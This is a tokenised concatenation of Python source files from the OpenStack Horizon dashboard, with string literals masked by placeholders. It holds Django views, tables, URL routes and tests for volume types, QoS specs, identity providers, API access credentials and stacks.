'<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> name = self . get_name ( ) <EOL> return { '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : self . kwargs [ '<STR_LIT>' ] } <EOL> class EditVolumeTypeView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . EditVolumeType <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> cancel_url = reverse_lazy ( '<STR_LIT>' ) <EOL> submit_label = _ ( '<STR_LIT>' ) <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume_type = api . cinder . volume_type_get ( self . request , <EOL> volume_type_id ) <EOL> except Exception : <EOL> error_message = _ ( <EOL> '<STR_LIT>' ) % volume_type_id <EOL> exceptions . handle ( self . request , <EOL> error_message , <EOL> redirect = self . success_url ) <EOL> return volume_type <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditVolumeTypeView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_data ( ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume_type = self . get_data ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume_type . name , <EOL> '<STR_LIT:description>' : getattr ( volume_type , '<STR_LIT:description>' , "<STR_LIT>" ) } <EOL> def _get_volume_type_name ( request , kwargs ) : <EOL> try : <EOL> volume_type_list = api . cinder . volume_type_list ( request ) <EOL> for volume_type in volume_type_list : <EOL> if volume_type . id == kwargs [ '<STR_LIT>' ] : <EOL> return volume_type . name <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( request , msg , redirect = url ) <EOL> class UpdateVolumeTypeEncryptionView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . UpdateVolumeTypeEncryption <EOL> form_id = "<STR_LIT>" <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> try : <EOL> self . _object = api . cinder . volume_encryption_type_get ( self . request , <EOL> self . kwargs [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> url = reverse ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg , redirect = url ) <EOL> return self . _object <EOL> @ memoized . memoized_method <EOL> def get_name ( self ) : <EOL> if not hasattr ( self , "<STR_LIT:name>" ) : <EOL> self . name = _get_volume_type_name ( self . request , self . kwargs ) <EOL> return self . name <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( UpdateVolumeTypeEncryptionView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> encryption_type = self . get_object ( ) <EOL> name = self . get_name ( ) <EOL> return { '<STR_LIT>' : encryption_type . volume_type_id , <EOL> '<STR_LIT>' : encryption_type . control_location , <EOL> '<STR_LIT>' : encryption_type . key_size , <EOL> '<STR_LIT>' : encryption_type . provider , <EOL> '<STR_LIT>' : encryption_type . cipher , <EOL> '<STR_LIT:name>' : name } <EOL> class CreateQosSpecView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . CreateQosSpec <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( <EOL> "<STR_LIT>" ) <EOL> class EditQosSpecConsumerView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . EditQosSpecConsumer <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( EditQosSpecConsumerView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ "<STR_LIT>" ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> qos_spec_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = api . cinder . qos_spec_get ( self . request , qos_spec_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return self . _object <EOL> def get_initial ( self ) : <EOL> qos_spec = self . get_object ( ) <EOL> qos_spec_id = self . kwargs [ '<STR_LIT>' ] <EOL> return { '<STR_LIT>' : qos_spec_id , <EOL> '<STR_LIT>' : qos_spec } <EOL> class ManageQosSpecAssociationView ( forms . ModalFormView ) : <EOL> form_class = volume_types_forms . ManageQosSpecAssociation <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> modal_id = "<STR_LIT>" <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ManageQosSpecAssociationView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ "<STR_LIT>" ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_object ( self , * args , ** kwargs ) : <EOL> type_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = api . cinder . volume_type_get ( self . request , type_id ) <EOL> except Exception : <EOL> msg = _ ( '<STR_LIT>' ) <EOL> exceptions . handle ( self . request , msg ) <EOL> return self . _object <EOL> @ memoized . memoized_method <EOL> def get_qos_specs ( self , * args , ** kwargs ) : <EOL> try : <EOL> return api . cinder . qos_spec_list ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> def find_current_qos_spec_association ( self , vol_type_id ) : <EOL> qos_specs = self . get_qos_specs ( ) <EOL> if qos_specs : <EOL> try : <EOL> for qos_spec in qos_specs : <EOL> type_ids = api . cinder . qos_spec_get_associations ( self . request , <EOL> qos_spec . id ) <EOL> for vtype in type_ids : <EOL> if vtype . id == vol_type_id : <EOL> return qos_spec <EOL> except Exception : <EOL> exceptions . handle ( <EOL> self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return None <EOL> def get_initial ( self ) : <EOL> volume_type = self . get_object ( ) <EOL> vol_type_id = self . kwargs [ '<STR_LIT>' ] <EOL> cur_qos_spec_id = None <EOL> cur_qos_spec_name = None <EOL> qos_spec = self . find_current_qos_spec_association ( vol_type_id ) <EOL> if qos_spec : <EOL> cur_qos_spec_id = qos_spec . id <EOL> cur_qos_spec_name = qos_spec . name <EOL> return { '<STR_LIT>' : vol_type_id , <EOL> '<STR_LIT:name>' : getattr ( volume_type , '<STR_LIT:name>' , None ) , <EOL> '<STR_LIT>' : cur_qos_spec_id , <EOL> '<STR_LIT>' : cur_qos_spec_name , <EOL> '<STR_LIT>' : self . get_qos_specs ( ) } </s>
<s> from django . core . urlresolvers import reverse <EOL> from django import http <EOL> from mox3 . mox import IgnoreArg <EOL> from mox3 . mox import IsA <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . test import helpers as test <EOL> IDPS_INDEX_URL = reverse ( '<STR_LIT>' ) <EOL> IDPS_REGISTER_URL = reverse ( '<STR_LIT>' ) <EOL> IDPS_UPDATE_URL = reverse ( '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' ] ) <EOL> IDPS_DETAIL_URL = reverse ( '<STR_LIT>' , <EOL> args = [ '<STR_LIT>' ] ) <EOL> class IdPsViewTests ( test . BaseAdminViewTests ) : <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_index ( self ) : <EOL> api . keystone . identity_provider_list ( IgnoreArg ( ) ) . AndReturn ( self . identity_providers . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_INDEX_URL ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , <EOL> self . identity_providers . list ( ) ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , ) } ) <EOL> def test_create ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_create ( IgnoreArg ( ) , <EOL> idp . id , <EOL> description = idp . description , <EOL> enabled = idp . enabled , <EOL> remote_ids = idp . remote_ids ) . AndReturn ( idp ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : idp . id , <EOL> '<STR_LIT:description>' : idp . description , <EOL> '<STR_LIT>' : idp . enabled , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( idp . remote_ids ) } <EOL> res = self . client . post ( IDPS_REGISTER_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_update ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> new_description = '<STR_LIT>' <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . identity_provider_update ( IsA ( http . HttpRequest ) , <EOL> idp . id , <EOL> description = new_description , <EOL> enabled = idp . enabled , <EOL> remote_ids = idp . remote_ids ) . AndReturn ( None ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:id>' : idp . id , <EOL> '<STR_LIT:description>' : new_description , <EOL> '<STR_LIT>' : idp . enabled , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( idp . remote_ids ) } <EOL> res = self . client . post ( IDPS_UPDATE_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> self . assertMessageCount ( success = <NUM_LIT:1> ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_delete ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_list ( IsA ( http . HttpRequest ) ) . AndReturn ( self . identity_providers . list ( ) ) <EOL> api . keystone . identity_provider_delete ( IsA ( http . HttpRequest ) , <EOL> idp . id ) . AndReturn ( None ) <EOL> self . mox . ReplayAll ( ) <EOL> formData = { '<STR_LIT:action>' : '<STR_LIT>' % idp . id } <EOL> res = self . client . post ( IDPS_INDEX_URL , formData ) <EOL> self . assertNoFormErrors ( res ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_detail ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . protocol_list ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( self . idp_protocols . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_DETAIL_URL ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> @ test . create_stubs ( { api . keystone : ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) } ) <EOL> def test_detail_protocols ( self ) : <EOL> idp = self . identity_providers . first ( ) <EOL> api . keystone . identity_provider_get ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( idp ) <EOL> api . keystone . protocol_list ( IsA ( http . HttpRequest ) , idp . id ) . AndReturn ( self . idp_protocols . list ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> res = self . client . get ( IDPS_DETAIL_URL + '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( <EOL> res , '<STR_LIT>' ) <EOL> self . assertTemplateUsed ( res , '<STR_LIT>' ) <EOL> self . assertItemsEqual ( res . context [ '<STR_LIT>' ] . data , <EOL> self . idp_protocols . list ( ) ) </s>
<s> from django . template . defaultfilters import title <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from openstack_auth import utils <EOL> from horizon import tables <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . dashboards . project . access_and_security . api_access import forms as project_forms <EOL> from openstack_dashboard import policy <EOL> def pretty_service_names ( name ) : <EOL> name = name . replace ( '<STR_LIT:->' , '<STR_LIT:U+0020>' ) <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> name = name . upper ( ) <EOL> else : <EOL> name = title ( name ) <EOL> return name <EOL> class DownloadEC2 ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> def allowed ( self , request , datum = None ) : <EOL> return api . base . is_service_enabled ( request , '<STR_LIT>' ) <EOL> class DownloadOpenRC ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> def allowed ( self , request , datum = None ) : <EOL> return utils . get_keystone_version ( ) >= <NUM_LIT:3> <EOL> class DownloadOpenRCv2 ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> verbose_name_plural = _ ( "<STR_LIT>" ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> class ViewCredentials ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> class RecreateCredentials ( tables . LinkAction ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> classes = ( "<STR_LIT>" , ) <EOL> icon = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> policy_rules = ( ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> action_type = "<STR_LIT>" <EOL> def allowed ( self , request , datum = None ) : <EOL> try : <EOL> target = { "<STR_LIT>" : request . user . id } <EOL> if ( api . base . is_service_enabled ( request , '<STR_LIT>' ) and <EOL> project_forms . get_ec2_credentials ( request ) and <EOL> policy . check ( ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) , <EOL> request , target = target ) ) : <EOL> return True <EOL> except Exception : <EOL> pass <EOL> return False <EOL> class EndpointsTable ( tables . DataTable ) : <EOL> api_name = tables . Column ( '<STR_LIT:type>' , <EOL> verbose_name = _ ( "<STR_LIT>" ) , <EOL> filters = ( pretty_service_names , ) ) <EOL> api_endpoint = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = _ ( "<STR_LIT>" ) ) <EOL> class Meta ( object ) : <EOL> name = "<STR_LIT>" <EOL> verbose_name = _ ( "<STR_LIT>" ) <EOL> multi_select = False <EOL> table_actions = ( DownloadOpenRCv2 , DownloadOpenRC , DownloadEC2 , <EOL> ViewCredentials , RecreateCredentials ) </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> class Containers ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = '<STR_LIT>' <EOL> permissions = ( '<STR_LIT>' , ) </s>
<s> from django . utils . translation import pgettext_lazy <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tables <EOL> from horizon . utils import filters <EOL> class AuditTable ( tables . DataTable ) : <EOL> ACTION_DISPLAY_CHOICES = ( <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , <EOL> u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ( "<STR_LIT:start>" , pgettext_lazy ( "<STR_LIT>" , u"<STR_LIT>" ) ) , <EOL> ) <EOL> request_id = tables . Column ( '<STR_LIT>' , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> action = tables . Column ( '<STR_LIT:action>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> display_choices = ACTION_DISPLAY_CHOICES ) <EOL> start_time = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) , <EOL> filters = [ filters . parse_isotime ] ) <EOL> user_id = tables . Column ( '<STR_LIT>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> message = tables . Column ( '<STR_LIT:message>' , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> class Meta ( object ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> def get_object_id ( self , datum ) : <EOL> return datum . request_id </s>
<s> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . network_topology import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . NetworkTopologyView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , views . RouterView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NetworkView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . InstanceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . RouterDetailView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . NTAddInterfaceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NetworkDetailView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . NTCreateSubnetView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . JSONView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTLaunchInstanceView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTCreateNetworkView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . NTCreateRouterView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> ] </s>
<s> import logging <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from horizon import tabs <EOL> from openstack_dashboard . api import neutron as api <EOL> from openstack_dashboard . dashboards . project . routers . extensions . extraroutes import tables as ertbl <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class ExtraRoutesTab ( tabs . TableTab ) : <EOL> table_classes = ( ertbl . ExtraRoutesTable , ) <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> template_name = "<STR_LIT>" <EOL> def allowed ( self , request ) : <EOL> try : <EOL> return api . is_extension_supported ( request , '<STR_LIT>' ) <EOL> except Exception : <EOL> LOG . info ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> return False <EOL> def get_extra_routes_data ( self ) : <EOL> try : <EOL> extraroutes = getattr ( self . tab_group . kwargs [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> except AttributeError : <EOL> extraroutes = [ ] <EOL> return [ api . RouterStaticRoute ( r ) for r in extraroutes ] </s>
<s> from django . conf . urls import url <EOL> from openstack_dashboard . dashboards . project . stacks import views <EOL> urlpatterns = [ <EOL> url ( r'<STR_LIT>' , views . IndexView . as_view ( ) , name = '<STR_LIT:index>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . SelectTemplateView . as_view ( ) , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . CreateStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . PreviewTemplateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , views . PreviewStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . PreviewStackDetailsView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . DetailView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ChangeTemplateView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . EditStackView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . ResourceView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , <EOL> views . JSONView . as_view ( ) , name = '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from django . core . urlresolvers import reverse <EOL> from django . core . urlresolvers import reverse_lazy <EOL> from django . utils import encoding <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . views import generic <EOL> from horizon import exceptions <EOL> from horizon import forms <EOL> from horizon import tables <EOL> from horizon import tabs <EOL> from horizon . utils import memoized <EOL> from openstack_dashboard import api <EOL> from openstack_dashboard . api import cinder <EOL> from openstack_dashboard import exceptions as dashboard_exception <EOL> from openstack_dashboard . usage import quotas <EOL> from openstack_dashboard . utils import filters <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import forms as project_forms <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import tables as project_tables <EOL> from openstack_dashboard . dashboards . project . volumes . volumes import tabs as project_tabs <EOL> class DetailView ( tabs . TabView ) : <EOL> tab_group_class = project_tabs . VolumeDetailTabs <EOL> template_name = '<STR_LIT>' <EOL> page_title = "<STR_LIT>" <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DetailView , self ) . get_context_data ( ** kwargs ) <EOL> volume = self . get_data ( ) <EOL> table = project_tables . VolumesTable ( self . request ) <EOL> context [ "<STR_LIT>" ] = volume <EOL> context [ "<STR_LIT:url>" ] = self . get_redirect_url ( ) <EOL> context [ "<STR_LIT>" ] = table . render_row_actions ( volume ) <EOL> choices = project_tables . VolumesTableBase . STATUS_DISPLAY_CHOICES <EOL> volume . status_label = filters . get_display_label ( choices , volume . status ) <EOL> return context <EOL> @ memoized . memoized_method <EOL> def get_data ( self ) : <EOL> try : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> volume = cinder . volume_get ( self . request , volume_id ) <EOL> snapshots = cinder . volume_snapshot_list ( <EOL> self . request , search_opts = { '<STR_LIT>' : volume . id } ) <EOL> if snapshots : <EOL> setattr ( volume , '<STR_LIT>' , True ) <EOL> for att in volume . attachments : <EOL> att [ '<STR_LIT>' ] = api . nova . server_get ( self . request , <EOL> att [ '<STR_LIT>' ] ) <EOL> except Exception : <EOL> redirect = self . get_redirect_url ( ) <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) , <EOL> redirect = redirect ) <EOL> return volume <EOL> def get_redirect_url ( self ) : <EOL> return reverse ( '<STR_LIT>' ) <EOL> def get_tabs ( self , request , * args , ** kwargs ) : <EOL> volume = self . get_data ( ) <EOL> return self . tab_group_class ( request , volume = volume , ** kwargs ) <EOL> class CreateView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = reverse_lazy ( "<STR_LIT>" ) <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_initial ( self ) : <EOL> initial = super ( CreateView , self ) . get_initial ( ) <EOL> self . default_vol_type = None <EOL> try : <EOL> self . default_vol_type = cinder . volume_type_default ( self . request ) <EOL> initial [ '<STR_LIT:type>' ] = self . default_vol_type . name <EOL> except dashboard_exception . NOT_FOUND : <EOL> pass <EOL> return initial <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateView , self ) . get_context_data ( ** kwargs ) <EOL> try : <EOL> context [ '<STR_LIT>' ] = quotas . tenant_limit_usages ( self . request ) <EOL> context [ '<STR_LIT>' ] = self . _get_volume_types ( ) <EOL> except Exception : <EOL> exceptions . handle ( self . request ) <EOL> return context <EOL> def _get_volume_types ( self ) : <EOL> try : <EOL> volume_types = cinder . volume_type_list ( self . request ) <EOL> except Exception : <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> no_type_description = None <EOL> if self . default_vol_type is None : <EOL> message = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> no_type_description = encoding . force_text ( message ) <EOL> type_descriptions = [ { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : no_type_description } ] + [ { '<STR_LIT:name>' : type . name , <EOL> '<STR_LIT:description>' : getattr ( type , "<STR_LIT:description>" , "<STR_LIT>" ) } <EOL> for type in volume_types ] <EOL> return json . dumps ( type_descriptions ) <EOL> class ExtendView ( forms . ModalFormView ) : <EOL> form_class = project_forms . ExtendForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_label = _ ( "<STR_LIT>" ) <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( "<STR_LIT>" ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_object ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> volume_id = self . kwargs [ '<STR_LIT>' ] <EOL> try : <EOL> self . _object = cinder . volume_get ( self . request , volume_id ) <EOL> except Exception : <EOL> self . _object = None <EOL> exceptions . handle ( self . request , <EOL> _ ( '<STR_LIT>' ) ) <EOL> return self . _object <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( ExtendView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . get_object ( ) <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) <EOL> context [ '<STR_LIT>' ] = reverse ( self . submit_url , args = args ) <EOL> try : <EOL> usages = quotas . tenant_limit_usages ( self . request ) <EOL> usages [ '<STR_LIT>' ] = ( usages [ '<STR_LIT>' ] <EOL> - context [ '<STR_LIT>' ] . size ) <EOL> context [ '<STR_LIT>' ] = usages <EOL> except Exception : <EOL> exceptions . handle ( self . request ) <EOL> return context <EOL> def get_initial ( self ) : <EOL> volume = self . get_object ( ) <EOL> return { '<STR_LIT:id>' : self . kwargs [ '<STR_LIT>' ] , <EOL> '<STR_LIT:name>' : volume . name , <EOL> '<STR_LIT>' : volume . size } <EOL> class CreateSnapshotView ( forms . ModalFormView ) : <EOL> form_class = project_forms . CreateSnapshotForm <EOL> modal_header = _ ( "<STR_LIT>" ) <EOL> template_name = '<STR_LIT>' <EOL> submit_url = "<STR_LIT>" <EOL> success_url = reverse_lazy ( '<STR_LIT>' ) <EOL> page_title = _ ( "<STR_LIT>" ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateSnapshotView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = self . kwargs [ '<STR_LIT>' ] <EOL> args = ( self . kwargs [ '<STR_LIT>' ] , ) 